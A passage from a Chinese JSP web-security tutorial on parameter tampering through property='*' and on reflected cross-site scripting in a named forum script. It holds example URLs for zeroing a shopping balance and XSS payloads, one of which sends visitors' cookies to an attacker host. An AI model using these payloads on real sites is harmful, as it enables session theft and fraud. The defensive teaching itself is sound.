注意到property="*"了吗?这表明用户在可见的JSP页面中输入的,或是
直接通过Query String提交的全部变量的值,将存储到匹配的bean属性中。
一般,用户是这样提交请求的:
http://www.somesite.com /addToBasket.jsp?newItem=ITEM0105342
但是不守规矩的用户呢?他们可能会提交:
http://www.somesite.com /addToBasket.jsp?newItem=ITEM0105342&balance=0
这样,balance=0的信息就被在存储到了JavaBean中了。当他们这时点击
“chekout”结账的时候,费用就全免了。
这与PHP中全局变量导致的安全问题如出一辙。
由此可见:“property="*"”一定要慎用!
三、长盛不衰的跨站脚本
跨站脚本(Cross Site Scripting)攻击是指在远程WEB页面的HTML代码中
手插入恶意的JavaScript, VBScript, ActiveX, HTML, 或Flash等脚本,窃取浏览此
页面的用户的隐私,改变用户的设置,破坏用户的数据。跨站脚本攻击在多
数情况下不会对服务器和WEB程序的运行造成影响,但对客户端的安全构成
严重的威胁。
以仿动网的阿菜论坛(beta-1)举个最简单的例子。当我们提交
http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser
<;script>alert(document.cookie)</script>
便能弹出包含自己cookie信息的对话框。而提交
http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser
<;script>document.location='http://www.163.com'</script>
就能重定向到网易。
由于在返回“name”变量的值给客户端时,脚本没有进行任何编码或过
滤恶意代码,当用户访问嵌入恶意“name”变量数据链接时,会导致脚本代
码在用户浏览器上执行,可能导致用户隐私泄露等后果。比如下面的链接:
http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<;script>document.location='http://www.hackersite.com/xxx.xxx?'+document.cookie</script>
xxx.xxx用于收集后边跟的参数,而这里参数指定的是document.cookie,也
就是访问此链接的用户的cookie。在ASP世界中,很多人已经把偷cookie的技
术练得炉火纯青了。在JSP里,读取cookie也不是难事。当然,跨站脚本从来
就不会局限于偷cookie这一项功能,相信大家都有一定了解,这里就不展开了。
对所有动态页面的输入和输出都应进行编码,可以在很大程度上避免跨
站脚本的攻击。遗憾的是,对所有不可信数据编码是资源密集型的工作,会
对 Web 服务器产生性能方面的影响。常用的手段还是进行输入数据的过滤,
比如下面的代码就把危险的字符进行替换:
文章来源于领测软件测试网 https://www.ltesting.net/
